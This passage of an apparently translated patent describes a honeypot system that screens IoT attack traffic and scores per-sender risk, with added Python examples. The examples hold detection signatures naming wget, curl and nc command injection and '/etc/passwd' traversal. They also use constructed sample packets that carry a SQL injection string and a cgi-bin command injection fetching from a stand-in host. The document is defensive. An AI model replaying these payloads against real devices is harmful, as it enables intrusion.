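        for name in position:
            results[name] = screen_subsystem(by_sub.get(name, []), rules_by_subsystem[name], known)
            found_here.update(p.sender for p, _ in results[name])
        known |= found_here
    return results

RULES = Rules(preset_protocols={"mqtt", "telnet"}, rate_threshold=2,
              keywords=["select", "subscribe", "/admin", "config", "../"],
              vuln_signatures=[r"\.\./\.\./etc/passwd"],
              iot_signatures={"mqtt": [r"subscribe\s+#"]},
              attack_signatures=[r"union\s+select", r"cmd=[^&]*[;|]\s*(?:wget|curl|nc)\b"],
              unexposed_pages={"/admin", "/download"})

SAMPLE = [  # constructed traffic, not captured data; screening order is A, C, B
    Packet("A", "203.0.113.7", "http", "/login", "user=a&pass=b' union select 1,2--"),
    Packet("A", "203.0.113.7", "http", "/login", "user=x&pass=y"),
    Packet("A", "198.51.100.2", "http", "/login", "user=alice&pass=hunter2"),
    Packet("C", "203.0.113.7", "http", "/login", "user=alice&pass=hunter2"),
    Packet("C", "192.0.2.9", "mqtt", "", "SUBSCRIBE #"),
    Packet("B", "192.0.2.9", "http", "/login", "user=q"),
    Packet("B", "198.51.100.5", "http", "/admin", "action=reboot"),
    Packet("B", "198.51.100.5", "http", "/download", "file=config.bin"),
    Packet("B", "198.51.100.9", "http", "/admin", "action=status", logged_in=True),
    Packet("B", "198.51.100.9", "http", "/admin", "action=logout", logged_in=True),
]

if __name__ == "__main__":
    for name, hits in screen_all(SAMPLE, [["A"], ["C"], ["B"]], dict.fromkeys("ABC", RULES)).items():
        print(name, [(p.sender, rule) for p, rule in hits])
```

With the sequential order A, C, B the MQTT attacker found in C is flagged again in B without any matching, while the logged-in administrator's management page traffic in B is not an attack packet even though it hits the keyword stage. With the two-position order `[["A"], ["C", "B"]]` the C attacker is no longer propagated to B, which is the cost of screening the second position in parallel.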
206. And processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
The attack risk of an attack data packet may be calculated with respect to the attack induction subsystem. In one example, the attack risk may be determined from the data of a single attack data packet, for example from parameters such as the screening rule hit by the attack data packet.
In another example, the attack risk may instead be determined for all attack data packets of the same sending user. Optionally, processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system may include:
according to the information of the sending user of the attack data packet, determining the attack data packet of the same sending user aiming at all attack induction subsystems as a user associated attack data packet of the sending user;
determining the attack risk of the user-associated attack data packets of the same sending user according to the number of those user-associated attack data packets, the number of attack induction subsystems attacked by them, the attack induction capability of those subsystems, and the screening rules hit by the user-associated attack data packets;
And processing the user associated attack data packet according to the attack risk of the user associated attack data packet of the same transmitting user and the processing mode corresponding to the attack risk.
The number of user-associated attack data packets may be converted into a risk score (the larger the number, the larger the risk score); each attack induction subsystem may be given a corresponding risk score; each screening rule may also be given a corresponding risk score; and the identification information corresponding to the attack induction capability may be converted into a corresponding risk score. The attack risk of the user-associated attack data packets of the same sending user may then be represented by the sum of the risk scores of all user-associated attack data packets of that sending user.
If the sum of the risk scores is higher than the risk score threshold, the attack data packets are processed by isolated storage, and the copies of the attack data packets stored in the attack induction system and in the system where the security management device for access data is located are deleted; the storage device used for isolated storage is a device that is not connected to the network.
Attack data packets whose risk score sum is not above the risk score threshold may be stored in an attack data packet database for later use.
Optionally, the embodiment may also analyze and count the attack data packet, generate a statistical report for the user to view, and so on. Optionally, the method of this embodiment may further include: based on the data in the analysis data packet of the attack data packet, acquiring the statistical information of the attack data packet on at least one abnormal flow statistical dimension; based on the statistical information, an abnormal traffic statistics report is generated.
Among the abnormal traffic statistics dimensions include, but are not limited to:
1. attacker IP;
2. attacker geographical location;
3. attacked port;
4. attack date;
5. number of attacks;
6. protocol used by the attack;
7. attack data payload;
8. description of the vulnerability exploited by the attack;
9. reference of the vulnerability exploited by the attack.
The vulnerability description may include the attack behavior of the attack data packet, the harm caused, the targeted server port, and so on. The vulnerability reference may include the provenance of the vulnerability, such as a paper title and page numbers.
In one example, after generating the abnormal traffic statistics report based on the statistics information, further comprising:
When an abnormal flow checking instruction sent by the management terminal is received, an abnormal flow statistical report is sent to the management terminal, so that the management terminal displays an abnormal flow checking page based on the abnormal flow statistical report.
Through the abnormal traffic viewing page, the administrative user can perform data query and analysis.
By adopting this embodiment, the access data packets received by at least one induction server in the attack induction system are obtained, where the attack induction system comprises at least two attack induction subsystems and each attack induction subsystem comprises an induction server and at least one induction client device connected to it; an attack data packet screening scheme is determined for each attack induction subsystem according to its attack induction capability; the attack data packets among the access data packets are determined according to the screening scheme corresponding to each attack induction subsystem and the access data packets it received; and the attack data packets are processed based on their determined attack risk to the attack induction system. Different attack induction subsystems can thus attract more kinds of attack behavior, so that the induction servers in the attack induction system receive more attack data packets, and the attack data packets are detected in a targeted way through the screening scheme corresponding to each attack induction subsystem, which yields a more accurate detection result, allows more device vulnerabilities to be found, and improves the security of the internet of things industry.
This embodiment also provides a refined embodiment of the security management method for access data. Suppose the attack induction system in this example comprises three attack induction subsystems: an attack induction subsystem A built with high-interaction honeypot technology, an attack induction subsystem B built with low-interaction honeypot technology, and a third attack induction subsystem C, where the attack induction subsystems B and C share one induction server.
Referring to fig. 3, the security management method for access data includes:
301. sending an access data packet acquisition request to the induction servers of the attack induction subsystems A to C, and receiving the access data packets sent by the induction servers in response to the request;
The access data packet acquisition request may carry the time at which access data packets were last acquired, so that the induction server sends only the access data packets received after that time.
302. Acquiring identification information of attack induction capability of the attack induction subsystems A to C, and determining a screening sequence and a screening rule of the attack induction subsystems A to C based on a mapping relation between the identification information and the screening sequence and the screening rule;
The calculation of the identification information refers to the description of the foregoing examples and is not repeated here.
In the screening sequence, the attack induction subsystem A is assumed to be in a first sequence, and the attack induction subsystem B and the attack induction subsystem C are in a second parallel sequence. The screening rules of the attack-inducing subsystem a may be the same as or different from the screening rules of the attack-inducing subsystems B and C, and the present embodiment is not limited thereto.
303. The method comprises the steps of obtaining a corresponding analysis data packet (for distinguishing, marked as a first analysis data packet) from an access data packet received by an attack induction subsystem A; based on the data of the first analysis data packet, acquiring a protocol used by the first analysis data packet and acquiring the access characteristic of a sending user of the first analysis data packet;
304. if the protocol of the first analysis data packet is a preset protocol in the screening rule and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule, determining that the first analysis data packet is the suspicious analysis data packet;
305. Performing keyword matching on suspicious analysis data packets based on preset attack data packet keywords in the screening rules; determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet;
306. If the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of a preset vulnerability set in the screening rule; or the content associated with the internet of things protocol in the high-suspicious analysis data packet has the attack characteristics for the internet of things protocol set in the screening rule; or the data of the high-suspicious analysis data packet has the attack characteristics of a preset network attack technique set in the screening rule, determining the access data packet corresponding to the high-suspicious analysis data packet as an attack data packet of the attack induction subsystem A;
307. Determining a transmitting user of an attack data packet of the attack induction subsystem A;
308. Determining the data packet sent by the sending user in the access data packets received by the attack induction subsystem B and the attack induction subsystem C as an attack data packet;
309. Parsing the remaining access data packets of the attack induction subsystems B and C into corresponding analysis data packets (marked as second analysis data packets for distinction); based on the data of the second analysis data packet, acquiring the protocol used by the second analysis data packet and the access characteristics of its sending user;
310. If the protocol of the second analysis data packet is a preset protocol in the screening rule and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule, determining that the second analysis data packet is the suspicious analysis data packet;
311. performing keyword matching on suspicious analysis data packets based on preset attack data packet keywords in the screening rules; determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet;
312. If the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of a preset vulnerability set in the screening rule; or the content associated with the internet of things protocol in the high-suspicious analysis data packet has the attack characteristics for the internet of things protocol set in the screening rule; or the data of the high-suspicious analysis data packet has the attack characteristics of a preset network attack technique set in the screening rule, determining the access data packet corresponding to the high-suspicious analysis data packet as an attack data packet of the attack induction subsystem B or C;
313. according to the information of the sending user of the attack data packet, determining the attack data packet of the same sending user aiming at all attack induction subsystems as a user associated attack data packet of the sending user;
314. Converting the number of the user associated attack data packets into a first risk score; determining a second risk score of the user association attack data packet according to a risk score corresponding to a preset screening rule and a screening rule in the user association attack data packet; obtaining a third risk score according to preset risk scores corresponding to the identification information of each attack induction subsystem and the attack induction subsystem corresponding to the user associated attack data packet; according to the corresponding relation between the number of the attack induction subsystems and the risk scores and the number of the attack induction subsystems corresponding to the user associated attack data packets, a fourth risk score is obtained, and the first, second, third and fourth risk scores are summed to obtain the sum of the risk scores of all the user associated attack data packets of the same transmitting user;
315. And if the sum of the risk scores is higher than the risk score threshold, performing isolated storage on the attack data packet, and deleting the attack data packet stored in the attack induction system, wherein storage equipment used by the isolated storage is non-networking equipment.
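The per-user risk scoring of step 314 and the processing decision of step 315 (and the same scheme described earlier for step 206), as an added example that is not the patent's own code. The score tables, the threshold, the choice to count the third score once per attacked subsystem, and the sample screening result are assumptions; the isolated store below stands in for the non-networked storage device.

```python
"""Added example (not the patent's code): the four risk scores of step 314 summed per
sending user and the isolated-storage decision of step 315. Score tables, the
threshold and the sample screening result are assumed/constructed."""
from collections import defaultdict

RULE_SCORES = {"vuln": 5, "iot": 4, "attack": 3, "unexposed_page": 3, "propagated": 1}
SUBSYSTEM_SCORES = {"A": 6, "B": 2, "C": 3}   # from each subsystem's capability identification
SUBSYSTEM_COUNT_SCORES = {1: 0, 2: 3, 3: 6}   # number of subsystems attacked -> score
THRESHOLD = 20

def count_score(n):                     # first risk score: grows with the packet count
    return min(n, 10)

def rule_score(hit_rule):               # "family:detail" -> score of the rule family
    return RULE_SCORES[hit_rule.split(":", 1)[0]]

def user_risk(attack_packets):
    """attack_packets: (sender, subsystem, hit_rule) triples, i.e. the user-associated
    attack data packets of every sender. Returns sender -> (total, (s1, s2, s3, s4))."""
    by_user = defaultdict(list)
    for sender, sub, rule in attack_packets:
        by_user[sender].append((sub, rule))
    risk = {}
    for sender, items in by_user.items():
        subs = {sub for sub, _ in items}
        s1 = count_score(len(items))
        s2 = sum(rule_score(rule) for _, rule in items)
        s3 = sum(SUBSYSTEM_SCORES[sub] for sub in subs)   # once per attacked subsystem (assumed)
        s4 = SUBSYSTEM_COUNT_SCORES[len(subs)]
        risk[sender] = (s1 + s2 + s3 + s4, (s1, s2, s3, s4))
    return risk

def process(attack_packets, online_store, isolated_store):
    """online_store: attack data packet database reachable from the induction system;
    isolated_store: stands in for the non-networked storage device. Packets of a
    sender above THRESHOLD move to isolated storage and are deleted online."""
    actions = {}
    for sender, (total, _) in user_risk(attack_packets).items():
        pkts = [p for p in attack_packets if p[0] == sender]
        if total > THRESHOLD:
            isolated_store.setdefault(sender, []).extend(pkts)
            online_store.pop(sender, None)          # delete the online copies
            actions[sender] = "isolated"
        else:
            online_store.setdefault(sender, []).extend(pkts)
            actions[sender] = "database"
    return actions

SAMPLE_RESULT = [  # constructed screening result, not real data
    ("203.0.113.7", "A", "attack:union select"),
    ("203.0.113.7", "A", "attack:union select"),
    ("203.0.113.7", "C", "propagated"),
    ("192.0.2.9", "C", "iot:mqtt:subscribe #"),
    ("192.0.2.9", "B", "propagated"),
    ("198.51.100.5", "B", "unexposed_page:/admin"),
    ("198.51.100.5", "B", "unexposed_page:/admin"),
    ("198.51.100.5", "B", "unexposed_page:/download"),
]

if __name__ == "__main__":
    online, isolated = {"203.0.113.7": ["earlier packet"]}, {}
    print(process(SAMPLE_RESULT, online, isolated))
    print(sorted(online), sorted(isolated))
```

The sender seen in two subsystems, including the strongest one (A), crosses the threshold although it hit only generic rules; the sender with the more specific MQTT hit stays below it because the subsystems it touched score low. Whether the third score is counted once per subsystem or once per packet is a tuning decision the text leaves open, and it changes the ranking noticeably for users who send many packets to one subsystem.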
By adopting this embodiment, richer kinds of attack behavior can be attracted through the different attack induction subsystems, so that the induction servers in the attack induction system receive more attack data packets, and the attack data packets are detected in a targeted way through the attack data packet screening scheme corresponding to each attack induction subsystem, which yields a more accurate detection result, allows more device vulnerabilities to be found, and improves the security of the internet of things industry.
To solve the above technical problem, this embodiment further provides a security management device for accessing data, referring to fig. 4, where the security management device for accessing data may include:
A data packet obtaining unit 401, configured to obtain an access data packet received by at least one induction server in an attack induction system, where the attack induction system includes at least two attack induction subsystems, each attack induction subsystem includes an induction server and at least one induction client device connected to the induction server;
A screening scheme determining unit 402, configured to determine a screening order and a screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;
A screening object determining unit 403, configured to determine an attack induction subsystem currently screened based on a screening order of each attack induction subsystem;
A first screening unit 404, configured to determine an attack data packet in the access data packets based on the screening rule corresponding to the currently screened attack induction subsystem and the access data packets received by the currently screened attack induction subsystem, if the currently screened attack induction subsystem is arranged at the forefront position in the screening sequence;
A second screening unit 405, configured to, if the currently screened attack induction subsystem is not arranged at the forefront position in the screening sequence, obtain the sending users of the attack data packets already screened out based on the screening results of the already screened attack induction subsystems, determine the access data packets sent by those sending users among the access data packets received by the currently screened attack induction subsystem to be attack data packets, and determine attack data packets among the remaining unselected access data packets based on the screening rule corresponding to the currently screened attack induction subsystem;
And the processing unit 406 is configured to process the attack data packet based on the determined attack risk of the attack data packet on the attack induction system.
In an alternative example, the security management apparatus for accessing data further includes a deployment unit for:
Before a data packet acquisition unit acquires an access data packet received by at least one induction server in an attack induction system, acquiring a system deployment file of an attack induction subsystem in the attack induction system;
Based on a deployment mode and a system deployment file corresponding to the attack induction subsystem, deploying a server induction device of the attack induction subsystem in a public network, and deploying an induction client device of the attack induction subsystem in a corresponding client end network, wherein the server induction device comprises an induction server.
In an alternative example, the attack-inducing subsystem includes at least two associated attack-inducing subsystems that share a first induction server;
A deployment unit for:
based on the deployment mode of at least one associated attack induction subsystem and a system deployment file, deploying the first induction server in a public network;
According to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying other server induction devices except the first induction server in the server induction devices of the associated attack induction subsystems;
and deploying the induction client equipment of each associated attack induction subsystem in the corresponding client end deployment network according to the deployment mode of each associated attack induction subsystem and the system deployment file.
In an alternative example, the association attack-inducing subsystem includes a first attack-inducing subsystem, a deployment unit configured to:
simulating induction client equipment to be set in the first attack induction subsystem in the public network according to a deployment mode and a system deployment file of the first attack induction subsystem;
And simulating a first target protocol required to run the service provided by the client-side induction equipment in the public network.
In an alternative example, the association attack-inducing subsystem includes a second attack-inducing subsystem, a deployment unit configured to:
Acquiring intranet access information of entity client equipment connected in a target intranet according to a deployment mode and a system deployment file of the second attack induction subsystem;
And determining the entity client equipment as the induction client equipment of the second attack induction subsystem, acquiring public network access information obtained after the internal network access information of the entity client equipment is mapped to a public network, and storing the public network access information in the first induction server.
In an alternative example, the attack-inducing subsystem includes a third attack-inducing subsystem, a deployment unit configured to:
Based on the deployment mode and the system deployment file of the third attack induction subsystem, deploying a server induction device based on a target Internet of things protocol in the public network;
Simulating an Internet of things protocol client device based on the target Internet of things protocol in a target intranet to obtain an induction client device of the third attack induction subsystem;
and simulating the operation of the application program of the internet of things protocol client device in the target intranet so as to simulate the operation of the internet of things protocol client device.
In an alternative example, the first screening unit is configured to:
Obtaining a corresponding analysis data packet for the access data packet received by the currently screened attack induction subsystem;
acquiring access behavior characteristic information corresponding to the analysis data packet, and determining suspicious analysis data packets in the analysis data packet based on the access behavior characteristic information;
And carrying out feature matching on the suspicious analysis data packet based on attack characteristic information of the attack data packet preset in a screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packet in the access data packet based on a matching result.
In an alternative example, the first screening unit is configured to:
acquiring a protocol used by the analysis data packet based on the data of the analysis data packet;
Based on the data of the analysis data packet, access characteristics of a sending user of the analysis data packet are obtained;
If the protocol of the analysis data packet is a preset protocol in the screening rule corresponding to the currently screened attack induction subsystem, and/or the corresponding access characteristic accords with the specific access characteristic of the preset suspicious user in the screening rule corresponding to the currently screened attack induction subsystem, determining that the analysis data packet is a suspicious analysis data packet.
In an alternative example, the first screening unit is configured to:
performing keyword matching on the suspicious analysis data packet based on the preset attack data packet keywords in the screening rules corresponding to the currently screened attack induction subsystem;
determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet;
and determining an attack data packet in the access data packet based on the high-suspicious analysis data packet.
In an alternative example, the first screening unit is configured to:
If the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of a preset vulnerability in the screening rule corresponding to the currently screened attack induction subsystem; and/or the content associated with the Internet of things protocol in the high-suspicious analysis data packet has the attack characteristics aimed at the Internet of things protocol in that screening rule; and/or the data of the high-suspicious analysis data packet has the attack characteristics of a preset network attack technique in that screening rule;
and determining the access data packet corresponding to the high-suspicious analysis data packet as an attack data packet.
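The ordered screening of units 404 and 405 together with the three stages of the first screening unit (suspicious by protocol or access characteristic, high-suspicious by keyword, attack by payload, IoT protocol or attack technique features), written out as an added Python example that is not the patent's own code. Subsystem names, capability values, rule contents and the sample packets are all constructed assumptions; the "analysis data packet" is represented by already split-out protocol and payload fields.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPacket:
    """An access packet after parsing (constructed representation of the patent's analysis data packet)."""
    sender: str
    subsystem: str   # name of the attack induction subsystem whose induction server received it
    protocol: str
    payload: str


@dataclass
class ScreeningRule:
    """Contents of one subsystem's screening rule. The patent names the categories, not the values."""
    protocols: frozenset           # preset protocols that make a packet suspicious
    max_requests: int              # access characteristic: more packets than this from one sender is suspicious
    keywords: tuple                # attack data packet keywords -> high-suspicious
    vuln_features: tuple           # vulnerability characteristics looked for in the payload
    iot_attack_features: tuple     # attack characteristics aimed at the IoT protocol
    attack_tech_features: tuple    # characteristics of preset network attack techniques


@dataclass
class Subsystem:
    name: str
    induction_capability: int      # assumed scalar; higher capability is screened earlier
    rule: ScreeningRule


def screening_order(subsystems):
    """Screening sequence derived from attack induction capability, strongest first."""
    return sorted(subsystems, key=lambda s: s.induction_capability, reverse=True)


def suspicious_packets(packets, rule):
    """Stage 1: preset protocol and/or per-sender access characteristic."""
    per_sender = Counter(p.sender for p in packets)
    return [p for p in packets
            if p.protocol in rule.protocols or per_sender[p.sender] > rule.max_requests]


def is_attack(packet, rule):
    """Stage 2 (keyword -> high-suspicious) and stage 3 (vulnerability / IoT / technique features)."""
    text = packet.payload.lower()
    if not any(k in text for k in rule.keywords):
        return False   # not high-suspicious, so not reported as an attack
    return (any(v in text for v in rule.vuln_features)
            or any(f in text for f in rule.iot_attack_features)
            or any(t in text for t in rule.attack_tech_features))


def screen_by_rule(packets, rule):
    return [p for p in suspicious_packets(packets, rule) if is_attack(p, rule)]


def screen_all(subsystems, packets):
    """Screen subsystems in order; later subsystems inherit the senders flagged by earlier ones."""
    attacks, flagged_senders = [], set()
    for position, sub in enumerate(screening_order(subsystems)):
        received = [p for p in packets if p.subsystem == sub.name]
        if position == 0:
            found = screen_by_rule(received, sub.rule)
        else:
            inherited = [p for p in received if p.sender in flagged_senders]
            remaining = [p for p in received if p.sender not in flagged_senders]
            found = inherited + screen_by_rule(remaining, sub.rule)
        attacks.extend(found)
        flagged_senders.update(p.sender for p in found)
    return attacks


# Constructed rules and packets; the router subsystem has the higher capability and is screened first.
ROUTER_RULE = ScreeningRule(frozenset({"http", "telnet"}), 3, ("wget", "/bin/sh", "admin"),
                            ("cgi-bin/;", "$("), (), ("/etc/passwd",))
MQTT_RULE = ScreeningRule(frozenset({"mqtt"}), 50, ("$sys", "#"),
                          (), ("$sys/#", "subscribe #"), ())
SAMPLE_SUBSYSTEMS = [
    Subsystem("mqtt_sim", induction_capability=5, rule=MQTT_RULE),
    Subsystem("router_entity", induction_capability=8, rule=ROUTER_RULE),
]
SAMPLE_PACKETS = [
    AccessPacket("198.51.100.7", "router_entity", "http", "GET /cgi-bin/;wget%20http://example.invalid/x HTTP/1.1"),
    AccessPacket("203.0.113.5", "router_entity", "http", "GET /index.html HTTP/1.1"),
    AccessPacket("203.0.113.5", "mqtt_sim", "mqtt", "SUBSCRIBE weather/temp"),
    AccessPacket("198.51.100.7", "mqtt_sim", "mqtt", "CONNECT clientid=probe"),   # inherited via sender
    AccessPacket("192.0.2.44", "mqtt_sim", "mqtt", "SUBSCRIBE $SYS/#"),
]

if __name__ == "__main__":
    for p in screen_all(SAMPLE_SUBSYSTEMS, SAMPLE_PACKETS):
        print(f"attack: {p.sender} -> {p.subsystem} [{p.protocol}] {p.payload}")
```

The fourth sample packet matches none of the MQTT rule's features and is still reported, because its sender was already screened out by the subsystem ahead of it in the sequence.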
In an alternative example, the processing unit is configured to:
according to the information of the sending user of the attack data packet, determining the attack data packet of the same sending user aiming at all attack induction subsystems as the user associated attack data packet of the sending user;
Determining the attack risk of the user associated attack data packets of the same transmitting user according to the number of the user associated attack data packets of the same transmitting user, the number of the attack induction subsystems attacked by the user associated attack data packets, the attack induction capacity and the screening rules of the user associated attack data packets;
according to the attack risk of the user associated attack data packets of the same transmitting user, processing the user associated attack data packets according to the processing mode corresponding to that attack risk.
In an alternative example, the security management apparatus for accessing data further includes a statistics unit configured to:
Based on the data in the analysis data packet of the attack data packet, acquiring the statistical information of the attack data packet on at least one abnormal traffic statistical dimension;
and generating an abnormal traffic statistical report based on the statistical information.
In an alternative example, the security management apparatus for accessing data further includes an information sending unit, configured to send the abnormal traffic statistical report to the management terminal when an abnormal traffic checking instruction sent by the management terminal is received, after the processing unit has generated the abnormal traffic statistical report based on the statistical information, so that the management terminal can display an abnormal traffic checking page based on the report.
By adopting the embodiment, the induction servers of different attack induction subsystems can be deployed in the public network, the required induction client devices can be deployed in the public network and the target intranet, and different attack induction subsystems can attract more abundant attack behaviors, so that the induction servers in the attack induction system can receive more attack data packets, and more equipment vulnerabilities can be found through detection of the attack data packets, thereby being beneficial to improving the safety of the Internet of things industry.
In addition, the embodiment of the present invention further provides a computer device, which may be a terminal or a server, as shown in fig. 5, which shows a schematic structural diagram of the computer device according to the embodiment of the present invention, specifically:
The computer device may include a processor 501 with one or more processing cores, a memory 502 with one or more computer-readable storage media, a power supply 503, and an input unit 504, among other components. Those skilled in the art will appreciate that the computer device structure shown in FIG. 5 does not limit the computer device, which may include more or fewer components than shown, combine certain components, or arrange the components differently. Wherein:
The processor 501 is the control center of the computer device, connects the various parts of the entire computer device using various interfaces and lines, runs or executes software programs and/or modules stored in the memory 502, and invokes data stored in the memory 502 to perform various functions and process data of the computer device, thereby performing overall monitoring of the computer device. Optionally, processor 501 may include one or more processing cores; preferably, the processor 501 may integrate an application processor that primarily handles operating systems, user interfaces, applications, etc., with a modem processor that primarily handles wireless communications. It will be appreciated that the modem processor may not be integrated into the processor 501.
The memory 502 may be used to store software programs and modules, and the processor 501 runs the software programs and modules stored in the memory 502 to perform various functional applications and data processing. The memory 502 may mainly include a storage program area and a storage data area, wherein the storage program area may store an operating system, an application program (such as a sound playing function, an image playing function, etc.) required for at least one function, and the like; the storage data area may store data created according to the use of the computer device, etc. In addition, memory 502 may include high-speed random access memory, and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other volatile solid-state storage device. Accordingly, the memory 502 may also include a memory controller to provide access to the memory 502 by the processor 501.
The computer device further includes a power supply 503 for powering the various components, preferably the power supply 503 is logically connected to the processor 501 by a power management system, such that the power management system performs functions such as managing charging, discharging, and power consumption. The power supply 503 may also include one or more of any of a direct current or alternating current power supply, a recharging system, a power failure detection circuit, a power converter or inverter, a power status indicator, and the like.
The computer device may also include an input unit 504, which input unit 504 may be used to receive input numeric or character information and to generate keyboard, mouse, joystick, optical or trackball signal inputs related to user settings and function control.
Although not shown, the computer device may further include a display unit or the like, which is not described herein. In particular, in this embodiment, the processor 501 in the computer device loads executable files corresponding to the processes of one or more application programs into the memory 502 according to the following instructions, and the processor 501 executes the application programs stored in the memory 502, so as to implement various functions as follows:
the method comprises the steps of obtaining access data packets received by at least one induction server in an attack induction system, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;
according to the attack induction capability of the attack induction subsystem, determining the screening sequence and screening rule of the attack data packet of each attack induction subsystem;
Determining a currently screened attack induction subsystem based on the screening sequence of each attack induction subsystem;
If the currently screened attack induction subsystem is arranged at the forefront position in the screening sequence, determining an attack data packet in the access data packet based on a screening rule corresponding to the currently screened attack induction subsystem and the access data packet received by the currently screened attack induction subsystem;
If the currently screened attack induction subsystem is not arranged at the forefront position in the screening sequence, acquiring a sending user of screened attack data packets based on a screening result of the screened attack induction subsystem, determining the access data packets sent by the sending user as attack data packets from access data packets received by the currently screened attack induction subsystem, and determining attack data packets in the unselected access data packets based on screening rules corresponding to the currently screened attack induction subsystem and the unselected access data packets of the currently screened attack induction subsystem;
and processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
The specific implementation of each operation above may be referred to the previous embodiments, and will not be described herein.
Those of ordinary skill in the art will appreciate that all or a portion of the steps of the various methods of the above embodiments may be performed by instructions or by instructions controlling associated hardware, which may be stored on a computer-readable storage medium and loaded and executed by a processor.
To this end, an embodiment of the present invention further provides a storage medium storing a plurality of instructions capable of being loaded by a processor to perform the method for managing security of access data provided by the embodiment of the present invention.
According to one aspect of the present application, there is also provided a computer program product or computer program comprising computer instructions stored in a computer readable storage medium. The processor of the computer device reads the computer instructions from the computer-readable storage medium, and the processor executes the computer instructions, so that the computer device performs the methods provided in the various alternative implementations of the above embodiments.
The storage medium may include: Read Only Memory (ROM), Random Access Memory (RAM), a magnetic disk, an optical disk, and the like.
Because the instructions stored in the storage medium can execute the steps of the security management method for access data provided by the embodiment of the present invention, they can achieve the beneficial effects that this method achieves; these are described in detail in the foregoing embodiments and are not repeated here.
The security management method, apparatus, computer device and storage medium for access data provided by the embodiments of the present invention have been described in detail above. Specific examples have been used to illustrate the principles and implementations of the present invention, and the above description of the embodiments is only intended to aid understanding of the method and core idea of the present invention; at the same time, since those skilled in the art will make changes to the specific embodiments and application scope according to the ideas of the present invention, the contents of this description should not, in summary, be construed as limiting the present invention.

Claims (12)

1. A method of security management of access to data, comprising:
acquiring a system deployment file of an attack induction subsystem in the attack induction system;
Based on a deployment mode and a system deployment file corresponding to the attack induction subsystem, deploying a server side induction device of the attack induction subsystem in a public network, and deploying an induction client side device of the attack induction subsystem in a corresponding client side end network, wherein the server side induction device comprises an induction server; comprising the following steps: when the attack-induction subsystem includes at least two associated attack-induction subsystems sharing a first induction server; based on the deployment mode of at least one associated attack induction subsystem and a system deployment file, deploying the first induction server in a public network; according to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying other server induction devices except the first induction server in the server induction devices of the associated attack induction subsystems; according to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying induction client equipment of each associated attack induction subsystem in a corresponding client end deployment network;
the method comprises the steps of obtaining access data packets received by at least one induction server in an attack induction system, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;
according to the attack induction capability of the attack induction subsystem, determining the screening sequence and screening rule of the attack data packet of each attack induction subsystem;
Determining a currently screened attack induction subsystem based on the screening sequence of each attack induction subsystem;
If the currently screened attack induction subsystem is arranged at the forefront position in the screening sequence, determining an attack data packet in the access data packet based on a screening rule corresponding to the currently screened attack induction subsystem and the access data packet received by the currently screened attack induction subsystem;
If the currently screened attack induction subsystem is not arranged at the forefront position in the screening sequence, acquiring a sending user of screened attack data packets based on a screening result of the screened attack induction subsystem, determining the access data packets sent by the sending user as attack data packets from access data packets received by the currently screened attack induction subsystem, and determining attack data packets in the unselected access data packets based on screening rules corresponding to the currently screened attack induction subsystem and the unselected access data packets of the currently screened attack induction subsystem;
and processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
2. The method according to claim 1, wherein the association attack induction subsystem includes a first attack induction subsystem, and the deploying, according to a deployment manner and a system deployment file of each association attack induction subsystem, an induction client device of each association attack induction subsystem in a corresponding client end network includes:
simulating induction client equipment to be set in the first attack induction subsystem in the public network according to a deployment mode and a system deployment file of the first attack induction subsystem;
and simulating a first target protocol required to run the service provided by the client-side-inducing device in the public network.
3. The method according to claim 1, wherein the associated attack-inducing subsystem includes a second attack-inducing subsystem, and the inducing client device for deploying each associated attack-inducing subsystem in the corresponding client end network according to the deployment method and the system deployment file of each associated attack-inducing subsystem includes:
Acquiring intranet access information of entity client equipment connected in a target intranet according to a deployment mode and a system deployment file of the second attack induction subsystem;
And determining the entity client equipment as the induction client equipment of the second attack induction subsystem, acquiring public network access information obtained after the internal network access information of the entity client equipment is mapped to a public network, and storing the public network access information in the first induction server.
4. The method according to claim 1, wherein when the attack-inducing subsystem includes a third attack-inducing subsystem, the deploying the server-side induction device of the attack-inducing subsystem in the public network and the inducing client-side device of the attack-inducing subsystem in the corresponding client-side deployment network based on the deployment method and the system deployment file corresponding to the attack-inducing subsystem, comprises:
Based on the deployment mode and the system deployment file of the third attack induction subsystem, deploying a server induction device based on a target Internet of things protocol in the public network;
Simulating an Internet of things protocol client device based on the target Internet of things protocol in a target intranet to obtain an induction client device of the third attack induction subsystem;
and simulating the operation of the application program of the internet of things protocol client device in the target intranet so as to simulate the operation of the internet of things protocol client device.
5. The method for securely managing access data according to any one of claims 1 to 4, wherein determining an attack data packet in the access data packets based on the screening rule corresponding to the currently screened attack induction subsystem and the access data packets received by the currently screened attack induction subsystem comprises:
Obtaining a corresponding analysis data packet for the access data packet received by the currently screened attack induction subsystem;
acquiring access behavior characteristic information corresponding to the analysis data packet, and determining suspicious analysis data packets in the analysis data packet based on the access behavior characteristic information;
And carrying out feature matching on the suspicious analysis data packet based on attack characteristic information of the attack data packet preset in a screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packet in the access data packet based on a matching result.
6. The method for securely managing access data according to claim 5, wherein the obtaining access behavior feature information corresponding to the parsed data packet, and determining suspicious parsed data packets in the parsed data packets based on the access behavior feature information, comprises:
acquiring a protocol used by the analysis data packet based on the data of the analysis data packet;
Based on the data of the analysis data packet, access characteristics of a sending user of the analysis data packet are obtained;
